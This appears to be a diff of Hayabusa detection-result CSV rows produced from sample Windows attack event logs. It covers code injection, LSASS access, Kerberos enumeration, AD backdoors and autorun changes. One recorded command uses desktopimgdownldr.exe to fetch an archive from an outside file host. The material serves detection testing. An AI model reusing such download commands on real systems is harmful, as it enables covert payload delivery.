+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: spooler.exe  payload.bin  :  Path: C:\Users\Public\tools\cinj\spooler.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: chost.exe  payload.bin  :  Path: C:\Users\Public\tools\evasion\chost.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe  /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr   :  Path: C:\Windows\System32\desktopimgdownldr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image  :  URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe  /root,""c:\windows\System32\calc.exe""  :  Path: C:\Windows\explorer.exe  :  User: ECORP\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: ECORP\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: ECORP\Administrator  :  Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe""   :  Path: C:\Windows\System32\win32calc.exe  :  User: ECORP\Administrator  :  Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ATACORE01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: PKI01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: EXCHANGE01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WEC01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS02$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WSUS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: DHCP01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ATANIDS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: PRTG-MON$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: MSSQL01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ADFS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WEBIIS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS03VULN$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59919  :  LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59920  :  LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59921  :  LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59993  :  LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60017  :  LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60018  :  LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60019  :  LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$  :  Workstation: -  :  IP Address: 10.23.42.30  :  Port: 62476  :  LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59641  :  LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$  :  Workstation: -  :  IP Address: fe80::1cae:5aa4:9d8d:106a  :  Port: 51370  :  LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59643  :  LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59644  :  LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59645  :  LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
